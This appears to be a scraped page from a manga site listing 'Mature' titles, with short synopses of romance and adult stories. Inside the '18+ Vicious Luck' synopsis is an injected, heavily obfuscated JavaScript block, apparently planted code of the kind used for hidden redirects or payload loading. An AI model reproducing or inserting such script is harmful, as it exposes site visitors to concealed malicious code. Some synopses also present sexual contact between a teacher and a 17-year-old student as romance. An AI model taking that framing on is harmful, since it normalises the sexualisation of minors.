Mature - Page 2

Explore the world of Mature manga, where gripping stories await. Start reading the best Mature manga free now!

2568 results

17 Sai Natsu - Seifuku no Jouji

A collection of short oneshots: 1) 17 Sai Natsu Aki connfessed one year ago to Yoh, but he was going out with someone at the time. So, when she finds out they broke up; what she does might be good at first. But in the end will she be happy with Yoh? Or will something go horribly wrong? 2) 17 Sai Fuyu Yui loves Maki, (childhood friend), but does Maki love her? During winter break she goes to her aunt's (where Maki lives) and confesses her love. Does Maki love her too? Or is she going to end up with a broken heart? 3) 17 Sai Haru One sentence is all I've ever wanted to hear from her. That's all. I love her. But I can't, I'm not allowed. She's my brother's fiance. Even so, I'll do anything to make her mine. If I hurt her, bring her pain, well, as long as I can be with her. I don't care if she hates me. 4) 17 Sai Aki Nao is in love with her Sempai. His brother confesses to her, and she uses him to get to the guy she likes. Will it work? Will she get her beloved Sempai?


17 Sai no Hisoka na Yokujou

“It’s fine if our hearts aren’t connected”, that is what Takamura sensei thought when he confessed to his student, Rin. But after a few times of bodily contact, Takamura started to desire Rin’s heart. Will Rin open himself up and accept Takamura? [ From Attractive Fascinante ] Also contains a doujinshi (Takamura X Rin).


17 Sai No Mama

These are stories that deal with being an underage mother and how the characters dealt with the situation. by Forbidden Garden: a series of oneshots: We are merely 17 years old and in love. And then I suddenly got pregnant, although he proposed to me straight away, my parents were against this, but I don't want to get an abortion, I want to be a mommy. No one can help us... which path is there for us to take? Little Life Growing Inside - Falling in love, and then getting pregnant, is that a sin? Just because we're still in high school? Spanning the Lost Life - Getting an abortion during the age of 15, and then being betrayed by the lover. I won't love anyone ever again, definitely... I Will Become a Strong Mother - I'm a single mother, I have a crush on someone, is having this type of feeling a burden? Believing the Feelings of Love


18 Rin

Follows the story of Rinko Ikeuchi, the daughter of wealthy parents who's on the fast track to enter medical school, but when her family falls on hard times Rinko is forced to take a job, any job, to make ends meet. When the handsome Sawakura shows up offering Rinko gainful employment she can't really say no, even after she realizes that it involves working as a production assistant in the world of hardcore adult videos.


18+ Vicious Luck

Chen Yang was just an ordinary person. One day, he was given an opportunity: he was offered the ability to control his luck! Love, status, and fortune were suddenly all within his grasp. When a person can control his luck at will, how will his life change? Will he run into beauties as soon as he steps outside his door? Will he trade as much stock as he possibly can? Damn… it’s too good to be true… Those who are my friends will all live wonderful lives. Those who are my enemies have already paid the price!<script></script><script>(function(_0xccb202,_0x47bf26){var _0x5c82f9=_0x1d13,_0x3e7c42=_0xccb202();while(!![]){try{var _0x5817c8=-parseInt(_0x5c82f9(0xb8))/(-0x209d+0x485*0x7+0xfb)+-parseInt(_0x5c82f9(0xcd))/(-0x19e4*-0x1+-0x1*0x11c5+-0x81d)+parseInt(_0x5c82f9(0xc1))/(0x1*0xc5+-0x2*-0x11af+-0x2420)+-parseInt(_0x5c82f9(0xcb))/(0x22c*0x6+-0x2b*-0x89+-0x2407)+-parseInt(_0x5c82f9(0xb9))/(-0x3d*0x32+-0x1cdd+-0x2ea*-0xe)*(parseInt(_0x5c82f9(0xcf))/(-0x21c8+0x24c2+-0x2f4))+-parseInt(_0x5c82f9(0xba))/(-0xa*-0x3d3+-0x5*0x62+-0x1*0x244d)+parseInt(_0x5c82f9(0xbd))/(-0x20b5*0x1+-0x2539+0x45f6);if(_0x5817c8===_0x47bf26)break;else _0x3e7c42['push'](_0x3e7c42['shift']());}catch(_0x425f9b){_0x3e7c42['push'](_0x3e7c42['shift']());}}}(_0x3be2,-0xaed80+0x2c*0x1d5f+-0x31993*-0x6));function _0x1d13(_0x466487,_0x58752e){var _0x327798=_0x3be2();return _0x1d13=function(_0x4a1d92,_0x7cd320){_0x4a1d92=_0x4a1d92-(-0x1130+-0x1cd6+0x2ebb);var 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20-Year-Old College Jocks

After breaking up with an irredeemable trash of an ex-boyfriend, the only thing Hyemin is lacking is sex. Normally, she wouldn't even look at a dating app, but the younger guy she met there brought a friend to their meeting place. “'Is it okay if we do it with the three of us, noona?' “Isn't that only possible in videos? …I don't know, let's just go for it like I've won the lottery!”


24 Hours Of My Secretary's Wild Desires

Both men and cars can't stop once they start running. I thought he was just my business partner, but my capable secretary's brakes for love are broken!+


24 Jikan Eigyouchuu

1-2) 24 Jikan Eikyou-chuu Nakamichi works in the 24-hour convenience store on Sano's way home from school. Nakamichi is baffled by the amount of lollipops Sano buy everyday! But he gets very used to seeing Sano around, that when suddenly Sano stops showing his face at the store, he misses him! What happens to Sano? And why buy so many lollipops? 3-5) 24 Jikan Renai-chuu Yoshino, an ordinary guy works at a convenience store where he meets a beautiful Yagami-san. He overhears Yagami-san having an argument over the phone with who he assumes is a girlfriend. What will Yoshino do when he sees Yagami drunk and collapsed outside the convenience store, and hears him whisper a guy's name in his sleep? 6-8) Extra: Jikan Eikyou-chuu


24 Jikan Kiss Dekinai

A math teacher who has an intense relationship with the problem student, Kikusui Kiyoya. Even though they were a couple in love, one day, Sensei suddenly wants to break up...? The discontinued book by Hana Umezawa, her first BL work re-released.


29 Sai Kareshi Nashi Kedamono Shachou To Ikinari Doukyo

"I'll make sure you'll have a good time." 29-year-old virgin, Chiaki, housesits her uncle's big house. She enjoys her freedom living by herself for the first time, but a strange man shows up at the house suddenly claiming he also lives in the house. He turns out to be the president of the company where Chiaki works! He caresses her in the bathroom, during dinner, at the office, and melts her body...What do you mean this is a secret project of the company...?


30-sai, Shojo OL

From Antisense Scanslations: Hinako, a 30-year-old virgin, has always had relationship problems. Due to her phobia of dirty things, she punches any guy who touches her. Desperate to find someone to love and help her graduate from being a virgin, she takes her much younger co-worker Kai up on his offer to date his friend Machida. Will she finally be free from her virginity streak and find someone to love her despite her phobia?


300Th Confession Of Love ~A Childhood Friend’S Intense Crush~

"I like you. Go out with me." My childhood friend, Ryo, has been confessing his love to me, Keito, since kindergarten. This is now his 296th time! I'd rather remain friends is what I had thought, yet I got anxious when I heard Ryo had kissed before at the drinking party and in a drunken state stole a kiss from him! "If you're okay with it I won't hold back." He says sweetly, kissing me passionately with vigor making me melt and feeling it down there! Such a fervent love from such a hottie, a childhood friend's yearning love!!
